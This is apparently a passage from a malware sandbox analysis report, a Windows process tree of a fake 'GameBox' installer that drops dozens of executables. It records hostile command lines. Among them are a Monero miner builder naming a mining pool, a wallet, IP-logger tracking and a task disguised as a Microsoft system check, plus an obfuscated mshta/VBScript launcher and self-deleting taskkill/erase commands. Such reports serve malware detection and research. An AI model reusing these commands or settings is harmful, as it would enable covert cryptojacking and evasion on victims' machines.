                                                  "C:\Users\Admin\AppData\Local\Temp\is-9DR10.tmp\Wr0qtdKR68nAMIsvlNReNhUZ.tmp" /SL5="$10288,138429,56832,C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe"
                                                  1⤵
                                                    PID:4680
                                                    • C:\Users\Admin\AppData\Local\Temp\is-B5D2S.tmp\Setup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\is-B5D2S.tmp\Setup.exe" /Verysilent
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:5524
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:5896
                                                        • C:\Users\Admin\AppData\Local\Temp\is-2BPFS.tmp\Stats.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-2BPFS.tmp\Stats.tmp" /SL5="$7019C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:6104
                                                          • C:\Users\Admin\AppData\Local\Temp\is-1P5G2.tmp\builder.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-1P5G2.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:192
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                        3⤵
                                                          PID:6016
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579442 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                            4⤵
                                                              PID:5472
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:5184
                                                            • C:\Users\Admin\AppData\Local\Temp\is-G5S3K.tmp\VPN.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-G5S3K.tmp\VPN.tmp" /SL5="$103A0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5648
                                                              • C:\Users\Admin\AppData\Local\Temp\is-6VUPS.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-6VUPS.tmp\Setup.exe" /silent /subid=720
                                                                5⤵
                                                                  PID:7552
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FLHGC.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FLHGC.tmp\Setup.tmp" /SL5="$302EE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-6VUPS.tmp\Setup.exe" /silent /subid=720
                                                                    6⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:7760
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                      7⤵
                                                                        PID:7688
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe remove tap0901
                                                                          8⤵
                                                                            PID:8640
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                          7⤵
                                                                            PID:5536
                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                              8⤵
                                                                                PID:7884
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                              7⤵
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:7920
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                              7⤵
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:8716
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5272
                                                                      • C:\Users\Admin\AppData\Roaming\3998453.exe
                                                                        "C:\Users\Admin\AppData\Roaming\3998453.exe"
                                                                        4⤵
                                                                          PID:5960
                                                                        • C:\Users\Admin\AppData\Roaming\3108827.exe
                                                                          "C:\Users\Admin\AppData\Roaming\3108827.exe"
                                                                          4⤵
                                                                          • Suspicious behavior: SetClipboardViewer
                                                                          PID:5676
                                                                        • C:\Users\Admin\AppData\Roaming\4810084.exe
                                                                          "C:\Users\Admin\AppData\Roaming\4810084.exe"
                                                                          4⤵
                                                                            PID:6276
                                                                          • C:\Users\Admin\AppData\Roaming\5228794.exe
                                                                            "C:\Users\Admin\AppData\Roaming\5228794.exe"
                                                                            4⤵
                                                                              PID:6312
                                                                            • C:\Users\Admin\AppData\Roaming\6397977.exe
                                                                              "C:\Users\Admin\AppData\Roaming\6397977.exe"
                                                                              4⤵
                                                                                PID:6192
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:5408
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:3952
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5348
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-2D8GG.tmp\MediaBurner2.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-2D8GG.tmp\MediaBurner2.tmp" /SL5="$402FE,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                4⤵
                                                                                  PID:2116
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-3M817.tmp\ultradumnibour.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-3M817.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                    5⤵
                                                                                    • Drops file in Drivers directory
                                                                                    • Adds Run key to start application
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3700
                                                                                    • C:\Program Files\Microsoft Office 15\RMSQRSMLSK\ultramediaburner.exe
                                                                                      "C:\Program Files\Microsoft Office 15\RMSQRSMLSK\ultramediaburner.exe" /VERYSILENT
                                                                                      6⤵
                                                                                        PID:7620
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-G1E3T.tmp\ultramediaburner.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-G1E3T.tmp\ultramediaburner.tmp" /SL5="$50208,281924,62464,C:\Program Files\Microsoft Office 15\RMSQRSMLSK\ultramediaburner.exe" /VERYSILENT
                                                                                          7⤵
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:6584
                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                            8⤵
                                                                                              PID:1432
                                                                                        • C:\Users\Admin\AppData\Local\Temp\be-feb0b-8f9-752b2-5d3249f066d0c\Daedigaexodu.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\be-feb0b-8f9-752b2-5d3249f066d0c\Daedigaexodu.exe"
                                                                                          6⤵
                                                                                          • Checks computer location settings
                                                                                          PID:4960
                                                                                        • C:\Users\Admin\AppData\Local\Temp\b8-cf448-8f3-89492-5a58b22965eb0\Laekoladody.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\b8-cf448-8f3-89492-5a58b22965eb0\Laekoladody.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          PID:5444
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lhqzl4vv.d1k\GcleanerEU.exe /eufive & exit
                                                                                            7⤵
                                                                                              PID:9200
                                                                                              • C:\Users\Admin\AppData\Local\Temp\lhqzl4vv.d1k\GcleanerEU.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\lhqzl4vv.d1k\GcleanerEU.exe /eufive
                                                                                                8⤵
                                                                                                  PID:9292
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lhqzl4vv.d1k\GcleanerEU.exe" & exit
                                                                                                    9⤵
                                                                                                      PID:8324
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im "GcleanerEU.exe" /f
                                                                                                        10⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:3636
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1kiymkti.owi\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                  7⤵
                                                                                                    PID:8208
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1kiymkti.owi\installer.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\1kiymkti.owi\installer.exe /qn CAMPAIGN="654"
                                                                                                      8⤵
                                                                                                        PID:9368
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkxjmxbm.4dz\anyname.exe & exit
                                                                                                      7⤵
                                                                                                        PID:8328
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xkxjmxbm.4dz\anyname.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\xkxjmxbm.4dz\anyname.exe
                                                                                                          8⤵
                                                                                                            PID:9608
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xkxjmxbm.4dz\anyname.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\xkxjmxbm.4dz\anyname.exe" -q
                                                                                                              9⤵
                                                                                                                PID:9820
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jhcp2y0n.j2p\gcleaner.exe /mixfive & exit
                                                                                                            7⤵
                                                                                                              PID:9468
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jhcp2y0n.j2p\gcleaner.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jhcp2y0n.j2p\gcleaner.exe /mixfive
                                                                                                                8⤵
                                                                                                                  PID:10100
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jhcp2y0n.j2p\gcleaner.exe" & exit
                                                                                                                    9⤵
                                                                                                                      PID:9880
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im "gcleaner.exe" /f
                                                                                                                        10⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:9872
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0nvsvtr.vip\autosubplayer.exe /S & exit
                                                                                                                  7⤵
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:9672
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                          3⤵
                                                                                                            PID:5444
                                                                                                            • C:\Users\Admin\Documents\VMjPuLaPkyK1tBA3RfQqa8uy.exe
                                                                                                              "C:\Users\Admin\Documents\VMjPuLaPkyK1tBA3RfQqa8uy.exe"
                                                                                                              4⤵
                                                                                                                PID:7056
                                                                                                              • C:\Users\Admin\Documents\hw3BGbYxjG_LDuGNTHRqbqux.exe
                                                                                                                "C:\Users\Admin\Documents\hw3BGbYxjG_LDuGNTHRqbqux.exe"
                                                                                                                4⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:7136
                                                                                                                • C:\Users\Admin\Documents\hw3BGbYxjG_LDuGNTHRqbqux.exe
                                                                                                                  C:\Users\Admin\Documents\hw3BGbYxjG_LDuGNTHRqbqux.exe
                                                                                                                  5⤵
                                                                                                                    PID:5436
                                                                                                                • C:\Users\Admin\Documents\GoUnJFPGOsZdfaokeqcBAHQ_.exe
                                                                                                                  "C:\Users\Admin\Documents\GoUnJFPGOsZdfaokeqcBAHQ_.exe"
                                                                                                                  4⤵
                                                                                                                    PID:4560
                                                                                                                  • C:\Users\Admin\Documents\xsqficFwDYq7tX_BOb1RwIa7.exe
                                                                                                                    "C:\Users\Admin\Documents\xsqficFwDYq7tX_BOb1RwIa7.exe"
                                                                                                                    4⤵
                                                                                                                      PID:6248
                                                                                                                    • C:\Users\Admin\Documents\6Au0P3PKfug2G5Mx0tXtPll6.exe
                                                                                                                      "C:\Users\Admin\Documents\6Au0P3PKfug2G5Mx0tXtPll6.exe"
                                                                                                                      4⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5008
                                                                                                                    • C:\Users\Admin\Documents\S4BOJqwzZcYqb3jtATUWbCXt.exe
                                                                                                                      "C:\Users\Admin\Documents\S4BOJqwzZcYqb3jtATUWbCXt.exe"
                                                                                                                      4⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7112
                                                                                                                    • C:\Users\Admin\Documents\A9s1p2VnxKQ1o80uWeSZqPOk.exe
                                                                                                                      "C:\Users\Admin\Documents\A9s1p2VnxKQ1o80uWeSZqPOk.exe"
                                                                                                                      4⤵
                                                                                                                        PID:7100
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 684
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:7588
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 640
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:7892
                                                                                                                      • C:\Users\Admin\Documents\LRD3UpFi31imbe2Tq7j1DiXp.exe
                                                                                                                        "C:\Users\Admin\Documents\LRD3UpFi31imbe2Tq7j1DiXp.exe"
                                                                                                                        4⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:6616
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 760
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:7444
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 812
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:7716
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 816
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5300
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 824
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:8396
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 996
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:8632
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 1048
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:8896
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 1344
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:9176
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 1416
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:8312
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 1296
                                                                                                                          5⤵
                                                                                                                          • Program crash
                                                                                                                          PID:9192
                                                                                                                      • C:\Users\Admin\Documents\jVPqY9rvCd_XRaq6p3bo7xe9.exe
                                                                                                                        "C:\Users\Admin\Documents\jVPqY9rvCd_XRaq6p3bo7xe9.exe"
                                                                                                                        4⤵
                                                                                                                          PID:7000
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "jVPqY9rvCd_XRaq6p3bo7xe9.exe" /f & erase "C:\Users\Admin\Documents\jVPqY9rvCd_XRaq6p3bo7xe9.exe" & exit
                                                                                                                            5⤵
                                                                                                                              PID:8648
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im "jVPqY9rvCd_XRaq6p3bo7xe9.exe" /f
                                                                                                                                6⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:9096
                                                                                                                          • C:\Users\Admin\Documents\zX1wCNjqnvEDTrzXo_gHB4i9.exe
                                                                                                                            "C:\Users\Admin\Documents\zX1wCNjqnvEDTrzXo_gHB4i9.exe"
                                                                                                                            4⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5564
                                                                                                                          • C:\Users\Admin\Documents\oJjjFNBT8m7LWwzTMUboq1qU.exe
                                                                                                                            "C:\Users\Admin\Documents\oJjjFNBT8m7LWwzTMUboq1qU.exe"
                                                                                                                            4⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:6892
                                                                                                                          • C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe
                                                                                                                            "C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe"
                                                                                                                            4⤵
                                                                                                                              PID:7096
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                5⤵
                                                                                                                                  PID:4824
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\pcVEKcfpKiIB67HQRbZwLBUA.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                    6⤵
                                                                                                                                      PID:4268
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill -IM "pcVEKcfpKiIB67HQRbZwLBUA.exe" -f
                                                                                                                                        7⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:496
                                                                                                                                • C:\Users\Admin\Documents\Qakblk5AgvO9429Fq_7zBAiM.exe
                                                                                                                                  "C:\Users\Admin\Documents\Qakblk5AgvO9429Fq_7zBAiM.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:1880
                                                                                                                                  • C:\Users\Admin\Documents\Qakblk5AgvO9429Fq_7zBAiM.exe
                                                                                                                                    "C:\Users\Admin\Documents\Qakblk5AgvO9429Fq_7zBAiM.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:6372
                                                                                                                                  • C:\Users\Admin\Documents\uh5oQ32HGmOSNg3txMasyvbM.exe
                                                                                                                                    "C:\Users\Admin\Documents\uh5oQ32HGmOSNg3txMasyvbM.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:3908
                                                                                                                                  • C:\Users\Admin\Documents\EJ0_uWwadDicJCfFyOzH_nnD.exe
                                                                                                                                    "C:\Users\Admin\Documents\EJ0_uWwadDicJCfFyOzH_nnD.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:6664
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5255354.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5255354.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:4680
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7095763.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7095763.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                        PID:5952
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4531297.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4531297.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:6696
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2576898.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2576898.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:6124
                                                                                                                                        • C:\Users\Admin\Documents\0NdIyNtiJPLhl_vRum8wFOO8.exe
                                                                                                                                          "C:\Users\Admin\Documents\0NdIyNtiJPLhl_vRum8wFOO8.exe"
                                                                                                                                          4⤵
                                                                                                                                            PID:7268
                                                                                                                                          • C:\Users\Admin\Documents\DDCsSp_lN7WI3ex6sQmwbwTn.exe
                                                                                                                                            "C:\Users\Admin\Documents\DDCsSp_lN7WI3ex6sQmwbwTn.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:6540
                                                                                                                                            • C:\Users\Admin\Documents\8vYKLnqePKOG1Q3QgQ9BM5vl.exe
                                                                                                                                              "C:\Users\Admin\Documents\8vYKLnqePKOG1Q3QgQ9BM5vl.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:7408
                                                                                                                                            • C:\Users\Admin\Documents\GMZBfGDQSCP41cRYW44E9gjQ.exe
                                                                                                                                              "C:\Users\Admin\Documents\GMZBfGDQSCP41cRYW44E9gjQ.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:7400
                                                                                                                                              • C:\Users\Admin\Documents\GMZBfGDQSCP41cRYW44E9gjQ.exe
                                                                                                                                                "C:\Users\Admin\Documents\GMZBfGDQSCP41cRYW44E9gjQ.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:5440
                                                                                                                                            • C:\Users\Admin\Documents\G9FsCEYly3ik3ls7A5gaW8e6.exe
                                                                                                                                              "C:\Users\Admin\Documents\G9FsCEYly3ik3ls7A5gaW8e6.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:6468
                                                                                                                                              • C:\Users\Admin\Documents\G9FsCEYly3ik3ls7A5gaW8e6.exe
                                                                                                                                                C:\Users\Admin\Documents\G9FsCEYly3ik3ls7A5gaW8e6.exe
                                                                                                                                                5⤵
                                                                                                                                                  PID:7948
                                                                                                                                              • C:\Users\Admin\Documents\8b22MoBVcRtgJwDgEfXevNUr.exe
                                                                                                                                                "C:\Users\Admin\Documents\8b22MoBVcRtgJwDgEfXevNUr.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:6760
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 388
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:6408
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 624
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:8544
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 588
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:9028
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 680
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:8336
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 588
                                                                                                                                                    5⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:8472
                                                                                                                                                • C:\Users\Admin\Documents\jVqS623owx_JXBhGaf7cOVX8.exe
                                                                                                                                                  "C:\Users\Admin\Documents\jVqS623owx_JXBhGaf7cOVX8.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:7688
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "jVqS623owx_JXBhGaf7cOVX8.exe" /f & erase "C:\Users\Admin\Documents\jVqS623owx_JXBhGaf7cOVX8.exe" & exit
                                                                                                                                                      5⤵
                                                                                                                                                        PID:1076
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im "jVqS623owx_JXBhGaf7cOVX8.exe" /f
                                                                                                                                                          6⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:8272
                                                                                                                                                    • C:\Users\Admin\Documents\7FNp3Fxr0hDf5acCyNVi4GVq.exe
                                                                                                                                                      "C:\Users\Admin\Documents\7FNp3Fxr0hDf5acCyNVi4GVq.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7848
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4JPHF.tmp\7FNp3Fxr0hDf5acCyNVi4GVq.tmp
